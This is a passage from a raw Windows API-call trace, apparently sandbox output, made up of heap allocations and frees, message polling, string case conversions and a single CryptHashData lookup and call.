returned 0x2e508c0 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.825] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0135.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0135.829] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0135.830] CryptHashData (hHash=0xa87490, pbData=0x2e54d38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0135.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0135.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0135.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0135.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0135.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0135.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0135.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0135.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.833] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0135.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0135.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0135.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0135.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0135.834] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0135.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0135.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0135.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0135.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0135.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0135.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0135.836] 